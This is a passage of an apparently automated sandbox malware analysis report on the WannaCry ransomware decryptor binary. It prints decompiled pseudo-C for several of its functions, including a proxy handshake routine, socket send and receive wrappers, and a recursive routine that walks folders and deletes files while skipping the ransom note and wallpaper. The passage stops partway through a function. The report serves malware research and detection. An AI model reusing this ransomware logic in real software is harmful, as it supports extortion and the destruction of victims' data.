                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #3874#4284#5277
                                                      • String ID:
                                                      • API String ID: 1717392697-0
                                                      • Opcode ID: 4114d52f3e371674d2295fde4232c802f8929f5cfba066acaa82d75807d1c039
                                                      • Instruction ID: 168dd717f23fd29799672b21daad70d98dc1c3a6295a550393a3fd33bd33aa1c
                                                      • Opcode Fuzzy Hash: 4114d52f3e371674d2295fde4232c802f8929f5cfba066acaa82d75807d1c039
                                                      • Instruction Fuzzy Hash: B1D012303487645AE974B266BA0BBDB5A999B45B18F04044FF2459F2C1D9D858D083E5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004133E6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 28%
                                                      			E004133E6(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {

				_t1 =  &_a16; // 0x413236
				_push( *_t1);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				L0041343E(); // executed
				return __eax;
			}



                                                      0x004133e6
                                                      0x004133e6
                                                      0x004133ea
                                                      0x004133ee
                                                      0x004133f2
                                                      0x004133f6
                                                      0x004133fb

                                                      APIs
                                                      • #1576.MFC42(?,?,?,62A,00413236,00000000,?,0000000A), ref: 004133F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #1576
                                                      • String ID: 62A
                                                      • API String ID: 1976119259-856450375
                                                      • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                      • Instruction ID: 1789da96975510f8b15a36ac976bc3503c656fbbd280c19756f03076dd05f2b6
                                                      • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                      • Instruction Fuzzy Hash: AFB008360193D6ABCB12DE91890196ABAA2BB98305F484C1DB2A50146187668568AB16
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405860 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 46%
                                                      			E00405860(void* __ecx, signed int _a4) {
				struct tagRECT _v16;
				signed int _t15;
				signed int _t23;
				void* _t24;

				_t24 = __ecx;
				_t23 = _a4;
				if( *(__ecx + 0x74) == 0) {
					 *(__ecx + 0x74) = _t23;
				}
				GetClientRect( *(_t24 + 0x20),  &_v16);
				_push(2);
				_push(_v16.bottom - _v16.top);
				_t15 = ( *((intOrPtr*)(_t24 + 0x68)) +  *((intOrPtr*)(_t24 + 0x60))) * _t23;
				_push(_t15);
				_push(0);
				_push(0);
				_push(0);
				L00412E60(); // executed
				return _t15;
			}







                                                      0x00405864
                                                      0x00405867
                                                      0x00405870
                                                      0x00405872
                                                      0x00405872
                                                      0x0040587e
                                                      0x00405894
                                                      0x00405898
                                                      0x00405899
                                                      0x0040589c
                                                      0x0040589d
                                                      0x0040589f
                                                      0x004058a1
                                                      0x004058a5
                                                      0x004058af

                                                      APIs
                                                      • GetClientRect.USER32(?,?), ref: 0040587E
                                                      • #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 004058A5
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #6197ClientRect
                                                      • String ID:
                                                      • API String ID: 2663203813-0
                                                      • Opcode ID: 08365d4a6b4c4d135f9bc492184b9046fd35a4d0fa1764fa72772bf707b20851
                                                      • Instruction ID: 7afc014e2c7f757f2c38916e7ea6268c43ad9ab86f90261082180cf4c9fc0c78
                                                      • Opcode Fuzzy Hash: 08365d4a6b4c4d135f9bc492184b9046fd35a4d0fa1764fa72772bf707b20851
                                                      • Instruction Fuzzy Hash: 56F03075740601AFE324DE19CD56F67F7E9EBD4B00F00891EB985D7390D670F8048695
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004058C0 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 46%
                                                      			E004058C0(void* __ecx, signed int _a4) {
				struct tagRECT _v16;
				void* _t15;
				signed int _t23;
				void* _t24;

				_t24 = __ecx;
				_t23 = _a4;
				if( *(__ecx + 0x70) == 0) {
					 *(__ecx + 0x70) = _t23;
				}
				GetClientRect( *(_t24 + 0x20),  &_v16);
				_push(2);
				_t15 = _v16.right - _v16.left;
				_push(( *((intOrPtr*)(_t24 + 0x6c)) +  *((intOrPtr*)(_t24 + 0x64))) * _t23);
				_push(_t15);
				_push(0);
				_push(0);
				_push(0);
				L00412E60(); // executed
				return _t15;
			}







                                                      0x004058c4
                                                      0x004058c7
                                                      0x004058d0
                                                      0x004058d2
                                                      0x004058d2
                                                      0x004058de
                                                      0x004058f7
                                                      0x004058f9
                                                      0x004058fb
                                                      0x004058fc
                                                      0x004058fd
                                                      0x004058ff
                                                      0x00405901
                                                      0x00405905
                                                      0x0040590f

                                                      APIs
                                                      • GetClientRect.USER32(?,?), ref: 004058DE
                                                      • #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 00405905
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #6197ClientRect
                                                      • String ID:
                                                      • API String ID: 2663203813-0
                                                      • Opcode ID: 562337e5099e57004b5b98cc37fc2bf590d1ad0ce7ac89810234b565acd6d4d2
                                                      • Instruction ID: 12e2120aa947bc0da8521fdfe4b738009e277cbc90461cf2c188bbd8c1c7c24c
                                                      • Opcode Fuzzy Hash: 562337e5099e57004b5b98cc37fc2bf590d1ad0ce7ac89810234b565acd6d4d2
                                                      • Instruction Fuzzy Hash: 60F01776700B01AFE214DA28C846F6BF7E9FBD4600F00891EB981D7290D6B0F8158A95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040D8C0 Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 75%
                                                      			E0040D8C0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a24) {
				void* _v0;
				intOrPtr _v16;
				signed int _v20;
				char _v266;
				char _v267;
				char _v268;
				char _v272;
				char _v280;
				char _v282;
				signed int _v283;
				char _v284;
				void _v287;
				void _v288;
				char _v289;
				char _v290;
				char _v291;
				char _v292;
				signed int _v296;
				char _v304;
				char _v312;
				char _v313;
				signed int _v315;
				char _v323;
				signed int _v324;
				signed int _t58;
				signed int _t65;
				signed int* _t66;
				void* _t71;
				void* _t74;
				void* _t86;
				signed int* _t87;
				void _t89;
				signed int _t111;
				signed int _t112;
				signed int _t117;
				void* _t127;
				void* _t132;
				void* _t141;
				intOrPtr _t143;

				_t58 =  *((intOrPtr*)(_v0 + 4))(_a4, _a8, _a24, _t132);
				if(_t58 != 0) {
					L24:
					return _t58 | 0xffffffff;
				} else {
					_t141 = _v0;
					_t89 = 0;
					_v272 = 0;
					if(_a8 != 0) {
						asm("repne scasb");
						_t89 = 1;
						_v272 = 1;
					}
					_v268 = 5;
					_v267 = 1;
					_v266 = 0;
					_t58 =  *((intOrPtr*)(_v0 + 0x20))(_a4,  &_v268, 3);
					if(_t58 < 0) {
						L22:
						_t143 = _a4;
						if(_t143 > 0) {
							__imp__#3(_t143); // executed
						}
						goto L24;
					} else {
						_t58 =  *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v280, 2);
						if(_t58 < 0 || _v292 != 5 || _v291 == 0xff) {
							goto L22;
						} else {
							_v292 = 5;
							_v291 = 1;
							_v290 = 0;
							if(_v16 == 0) {
								_v289 = 1;
								_v288 =  *_t141;
								_t65 = _v20;
								_v283 = _t65;
								_v284 = _t65 >> 8;
								_t66 =  &_v282;
							} else {
								_v289 = 3;
								_t111 = _v296 & 0x000000ff;
								_v288 = _t89;
								_t112 = _t111 >> 2;
								memcpy( &_v287, _t141, _t112 << 2);
								_t86 = memcpy(_t141 + _t112 + _t112, _t141, _t111 & 0x00000003);
								_t117 = _v20;
								 *_t86 = _t117 >> 8;
								_t87 = _t86 + 1;
								 *_t87 = _t117;
								_t66 =  &(_t87[0]);
							}
							_t58 =  *((intOrPtr*)(_v0 + 0x20))(_a4,  &_v292, _t66 -  &_v292);
							if(_t58 < 0) {
								goto L22;
							} else {
								_t58 =  *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v304, 4);
								if(_t58 < 0) {
									goto L22;
								} else {
									_t58 = _v315;
									if(_t58 != 0) {
										goto L22;
									} else {
										_t71 = _v313 - 1;
										if(_t71 == 0) {
											_t127 = _v0;
											_push(6);
											goto L19;
										} else {
											_t74 = _t71 - 2;
											if(_t74 == 0) {
												 *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v312, 1);
												_t127 = _v0;
												_push((_v324 & 0x000000ff) + 2);
												_push( &_v323);
												_push(_a4);
												goto L20;
											} else {
												if(_t74 != 1) {
													L21:
													return 0;
												} else {
													_t127 = _v0;
													_push(0x12);
													L19:
													_push( &_v312);
													_push(_a4);
													L20:
													_t58 =  *((intOrPtr*)(_t127 + 0x24))();
													if(_t58 < 0) {
														goto L22;
													} else {
														goto L21;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}










































                                                      0x0040d8e9
                                                      0x0040d8ee
                                                      0x0040dab4
                                                      0x0040dac1
                                                      0x0040d8f4
                                                      0x0040d8fb
                                                      0x0040d902
                                                      0x0040d906
                                                      0x0040d90a
                                                      0x0040d913
                                                      0x0040d91a
                                                      0x0040d91c
                                                      0x0040d91c
                                                      0x0040d930
                                                      0x0040d935
                                                      0x0040d93a
                                                      0x0040d93f
                                                      0x0040d944
                                                      0x0040daa6
                                                      0x0040daa6
                                                      0x0040daab
                                                      0x0040daae
                                                      0x0040daae
                                                      0x00000000
                                                      0x0040d94a
                                                      0x0040d95a
                                                      0x0040d95f
                                                      0x00000000
                                                      0x0040d981
                                                      0x0040d988
                                                      0x0040d98f
                                                      0x0040d994
                                                      0x0040d999
                                                      0x0040d9db
                                                      0x0040d9e0
                                                      0x0040d9e4
                                                      0x0040d9ed
                                                      0x0040d9f4
                                                      0x0040d9f8
                                                      0x0040d99b
                                                      0x0040d9a8
                                                      0x0040d9ad
                                                      0x0040d9af
                                                      0x0040d9b9
                                                      0x0040d9bc
                                                      0x0040d9c3
                                                      0x0040d9c5
                                                      0x0040d9d1
                                                      0x0040d9d3
                                                      0x0040d9d4
                                                      0x0040d9d6
                                                      0x0040d9d6
                                                      0x0040da11
                                                      0x0040da16
                                                      0x00000000
                                                      0x0040da1c
                                                      0x0040da2c
                                                      0x0040da31
                                                      0x00000000
                                                      0x0040da33
                                                      0x0040da33
                                                      0x0040da39
                                                      0x00000000
                                                      0x0040da3b
                                                      0x0040da40
                                                      0x0040da41
                                                      0x0040da80
                                                      0x0040da83
                                                      0x00000000
                                                      0x0040da43
                                                      0x0040da43
                                                      0x0040da46
                                                      0x0040da62
                                                      0x0040da69
                                                      0x0040da78
                                                      0x0040da7c
                                                      0x0040da7d
                                                      0x00000000
                                                      0x0040da48
                                                      0x0040da49
                                                      0x0040da97
                                                      0x0040daa3
                                                      0x0040da4b
                                                      0x0040da4b
                                                      0x0040da4e
                                                      0x0040da85
                                                      0x0040da8c
                                                      0x0040da8d
                                                      0x0040da8e
                                                      0x0040da90
                                                      0x0040da95
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040da95
                                                      0x0040da49
                                                      0x0040da46
                                                      0x0040da41
                                                      0x0040da39
                                                      0x0040da31
                                                      0x0040da16
                                                      0x0040d95f
                                                      0x0040d944

                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 912c8ddbc3f5d0546dfc53f6ab7b6c2a54f01fcb62a7659748a7d661530e9815
                                                      • Instruction ID: 869c219edba7a699f97af29913b463c5d84a0a7100ec88bf0606293c61a6210c
                                                      • Opcode Fuzzy Hash: 912c8ddbc3f5d0546dfc53f6ab7b6c2a54f01fcb62a7659748a7d661530e9815
                                                      • Instruction Fuzzy Hash: BB51803130C2869FD714CF58C840BAB7BD9AF99304F04452DF98A9B382D678D90DCBA6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004068E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 90%
                                                      			E004068E0(intOrPtr _a4) {
				intOrPtr _t5;
				intOrPtr _t8;
				intOrPtr _t9;

				_t5 = _a4;
				_t8 =  *((intOrPtr*)(_t5 + 4));
				if(_t8 != 0x100) {
					if(_t8 != 0x104 ||  *((intOrPtr*)(_t5 + 8)) != 0x73) {
						goto L7;
					} else {
						return 1;
					}
				} else {
					_t9 =  *((intOrPtr*)(_t5 + 8));
					if(_t9 == 0xd || _t9 == 0x1b) {
						return 1;
					} else {
						L7:
						_push(_t5); // executed
						L00412CB6(); // executed
						return _t5;
					}
				}
			}






                                                      0x004068e0
                                                      0x004068e4
                                                      0x004068ed
                                                      0x0040690a
                                                      0x00000000
                                                      0x00406912
                                                      0x00406917
                                                      0x00406917
                                                      0x004068ef
                                                      0x004068ef
                                                      0x004068f5
                                                      0x00406901
                                                      0x0040691a
                                                      0x0040691a
                                                      0x0040691a
                                                      0x0040691b
                                                      0x00406920
                                                      0x00406920
                                                      0x004068f5

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5280
                                                      • String ID:
                                                      • API String ID: 2434734067-0
                                                      • Opcode ID: 7e96320addb5fbfd6a512322df2ba5d045d5938d17d503c07870c62d9cf9f9c3
                                                      • Instruction ID: 7c996b979d0e86874aef4d69ce28bf61b51dac78b1e0fd433df73bfd4df6564a
                                                      • Opcode Fuzzy Hash: 7e96320addb5fbfd6a512322df2ba5d045d5938d17d503c07870c62d9cf9f9c3
                                                      • Instruction Fuzzy Hash: 45E0B6B97011008AEA20CB04C294A5FA292A7E0714F76C077E1899BAA9C27DCDE1CA1D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040DB60 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • send.WS2_32(?,?,?,00000000), ref: 0040DB71
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: send
                                                      • String ID:
                                                      • API String ID: 2809346765-0
                                                      • Opcode ID: 3222a83dba255473e0a20e544844f5fa8dd218e70a3b82de0a2cb3badf245f05
                                                      • Instruction ID: 9f2cde9bc08329bc066051ceec9112dcc508ea1adec728888a2f9463dd607dc2
                                                      • Opcode Fuzzy Hash: 3222a83dba255473e0a20e544844f5fa8dd218e70a3b82de0a2cb3badf245f05
                                                      • Instruction Fuzzy Hash: D9C04C79204300FFD204CB10CD85F6BB7A9EBD4710F50C90DB98983254C670EC10DA65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040DB80 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • recv.WS2_32(?,?,?,00000000), ref: 0040DB91
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: recv
                                                      • String ID:
                                                      • API String ID: 1507349165-0
                                                      • Opcode ID: 1d9f9cd7d87b293edf20ef63389b80cde037e3ff80316bdb179f77fce595cd06
                                                      • Instruction ID: 7776e5be7928a6c2c2562dd3bb1774681ff5e82bf649542f35cb965541f1d725
                                                      • Opcode Fuzzy Hash: 1d9f9cd7d87b293edf20ef63389b80cde037e3ff80316bdb179f77fce595cd06
                                                      • Instruction Fuzzy Hash: 0BC04CB9204300FFD204CB10CD85F6BB7A9EBD4711F10C90DB98D86254C670EC10DA65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 004026B0 Relevance: 54.6, APIs: 26, Strings: 5, Instructions: 318fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 74%
                                                      			E004026B0(void* __ecx) {
				void* _t109;
				intOrPtr* _t110;
				int _t111;
				void* _t115;
				intOrPtr* _t116;
				intOrPtr* _t123;
				intOrPtr _t124;
				char _t125;
				intOrPtr* _t129;
				intOrPtr* _t131;
				intOrPtr* _t135;
				int _t139;
				int _t145;
				int _t146;
				int _t147;
				int _t149;
				int _t154;
				intOrPtr* _t221;
				void _t225;
				intOrPtr* _t226;
				wchar_t* _t227;
				intOrPtr* _t228;
				intOrPtr* _t229;
				void* _t231;
				void* _t232;
				intOrPtr _t234;
				void* _t235;
				void* _t236;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t240;
				void* _t242;

				_push(0xffffffff);
				_push(E0041356E);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t234;
				_t235 = _t234 - 0x56c;
				_t232 = __ecx;
				 *((char*)(_t235 + 0x24)) =  *((intOrPtr*)(_t235 + 3));
				 *((intOrPtr*)(_t235 + 0x20)) = E0040C8F0( *((intOrPtr*)(_t235 + 3)), 0, 0);
				 *((intOrPtr*)(_t235 + 0x24)) = 0;
				 *((char*)(_t235 + 0x10)) =  *((intOrPtr*)(_t235 + 0xb));
				 *(_t235 + 0x584) = 0;
				 *((intOrPtr*)(_t235 + 0x10)) = E0040C8F0(_t105, 0, 0);
				 *((intOrPtr*)(_t235 + 0x14)) = 0;
				 *((char*)(_t235 + 0x588)) = 1;
				swprintf(_t235 + 0x54, L"%s\\*",  *(_t235 + 0x584), _t231);
				_t236 = _t235 + 0xc;
				_t109 = FindFirstFileW(_t236 + 0x54, _t236 + 0x324);
				 *(_t236 + 0x18) = _t109;
				if(_t109 != 0xffffffff) {
					while(1) {
						_t110 =  *((intOrPtr*)(_t232 + 0x4d0));
						if(_t110 != 0 &&  *_t110 != 0) {
							break;
						}
						_t111 = wcscmp(_t236 + 0x358, ".");
						_t236 = _t236 + 8;
						if(_t111 != 0) {
							_t139 = wcscmp(_t236 + 0x358, L"..");
							_t236 = _t236 + 8;
							if(_t139 != 0) {
								_push(_t236 + 0x358);
								swprintf(_t236 + 0x64, L"%s\\%s",  *(_t236 + 0x58c));
								_t236 = _t236 + 0x10;
								if((GetFileAttributesW(_t236 + 0x5c) & 0x00000010) == 0) {
									_t145 = wcscmp(_t236 + 0x358, L"@Please_Read_Me@.txt");
									_t236 = _t236 + 8;
									if(_t145 != 0) {
										_t146 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.exe.lnk");
										_t236 = _t236 + 8;
										if(_t146 != 0) {
											_t147 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.bmp");
											_t236 = _t236 + 8;
											if(_t147 != 0) {
												 *((char*)(_t236 + 0x4c)) =  *((intOrPtr*)(_t236 + 0x13));
												__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
												_t149 = wcslen(_t236 + 0x5c);
												_t236 = _t236 + 4;
												__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t149);
												 *((char*)(_t236 + 0x590)) = 3;
												E00402DA0(_t236 + 0x48, _t236 + 0x20, _t236 + 0x38,  *(_t236 + 0x18), _t236 + 0x48);
												 *((char*)(_t236 + 0x584)) = 1;
												_push(1);
												goto L14;
											}
										}
									}
								} else {
									if(E00402AF0(_t143, _t236 + 0x5c, _t236 + 0x358) == 0) {
										 *((char*)(_t236 + 0x3c)) =  *((intOrPtr*)(_t236 + 0x13));
										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
										_t154 = wcslen(_t236 + 0x5c);
										_t236 = _t236 + 4;
										__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t154);
										 *((char*)(_t236 + 0x590)) = 2;
										E00402DA0(_t236 + 0x38, _t236 + 0x30, _t236 + 0x34,  *((intOrPtr*)(_t236 + 0x28)), _t236 + 0x38);
										 *((char*)(_t236 + 0x584)) = 1;
										_push(1);
										L14:
										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z();
									}
								}
							}
						}
						if(FindNextFileW( *(_t236 + 0x20), _t236 + 0x32c) != 0) {
							continue;
						}
						break;
					}
					FindClose( *(_t236 + 0x20));
					_t115 =  *(_t236 + 0x18);
					_t225 =  *_t115;
					if(_t225 != _t115) {
						while(1) {
							_t135 =  *((intOrPtr*)(_t232 + 0x4d0));
							if(_t135 != 0 &&  *_t135 != 0) {
								goto L22;
							}
							_t136 =  *((intOrPtr*)(_t225 + 0xc));
							if( *((intOrPtr*)(_t225 + 0xc)) == 0) {
								_t136 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
							}
							E00402560(_t232, _t136);
							_t225 =  *_t225;
							if(_t225 !=  *(_t236 + 0x18)) {
								continue;
							}
							goto L22;
						}
					}
					L22:
					_t116 =  *((intOrPtr*)(_t236 + 0x28));
					_t226 =  *_t116;
					if(_t226 != _t116) {
						while(1) {
							_t131 =  *((intOrPtr*)(_t232 + 0x4d0));
							if(_t131 != 0 &&  *_t131 != 0) {
								goto L28;
							}
							_t132 =  *((intOrPtr*)(_t226 + 0xc));
							if( *((intOrPtr*)(_t226 + 0xc)) == 0) {
								_t132 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
							}
							E004026B0(_t232, _t132);
							_t226 =  *_t226;
							if(_t226 !=  *((intOrPtr*)(_t236 + 0x28))) {
								continue;
							}
							goto L28;
						}
					}
					L28:
					_t227 =  *(_t236 + 0x58c);
					swprintf(_t236 + 0x64, L"%s\\%s", _t227);
					_t237 = _t236 + 0x10;
					DeleteFileW(_t237 + 0x5c);
					swprintf(_t237 + 0x64, L"%s\\%s", _t227, L"@WanaDecryptor@.exe.lnk", L"@Please_Read_Me@.txt");
					_t238 = _t237 + 0x10;
					DeleteFileW(_t238 + 0x5c);
					_t123 =  *((intOrPtr*)(_t238 + 0x18));
					 *((char*)(_t238 + 0x584)) = 0;
					_t221 = _t123;
					_t228 =  *_t123;
					if(_t228 != _t123) {
						do {
							_t129 = _t228;
							_t228 =  *_t228;
							E00402E90(_t238 + 0x1c, _t238 + 0x34, _t129);
						} while (_t228 != _t221);
						_t123 =  *((intOrPtr*)(_t238 + 0x18));
					}
					_push(_t123);
					L00412C98();
					_t229 =  *((intOrPtr*)(_t238 + 0x2c));
					 *((intOrPtr*)(_t238 + 0x1c)) = 0;
					 *((intOrPtr*)(_t238 + 0x20)) = 0;
					_t239 = _t238 + 4;
					_t124 =  *_t229;
					 *((intOrPtr*)(_t239 + 0x584)) = 0xffffffff;
					 *((intOrPtr*)(_t239 + 0x20)) = _t124;
					if(_t124 != _t229) {
						do {
							_push(0);
							E00402E90(_t239 + 0x2c, _t239 + 0x58,  *((intOrPtr*)(E00402D90(_t239 + 0x28, _t239 + 0x34))));
						} while ( *((intOrPtr*)(_t239 + 0x20)) != _t229);
					}
					_push( *((intOrPtr*)(_t239 + 0x28)));
					L00412C98();
					_t240 = _t239 + 4;
					_t125 = 1;
				} else {
					 *((char*)(_t236 + 0x57c)) = 0;
					E00402E00(_t236 + 0x18, _t236 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x10)))),  *((intOrPtr*)(_t236 + 0x10)));
					_push( *((intOrPtr*)(_t236 + 0x10)));
					L00412C98();
					_t242 = _t236 + 4;
					 *((intOrPtr*)(_t242 + 0x10)) = 0;
					 *((intOrPtr*)(_t242 + 0x14)) = 0;
					 *((intOrPtr*)(_t242 + 0x588)) = 0xffffffff;
					E00402E00(_t242 + 0x28, _t242 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x24)))),  *((intOrPtr*)(_t236 + 0x24)));
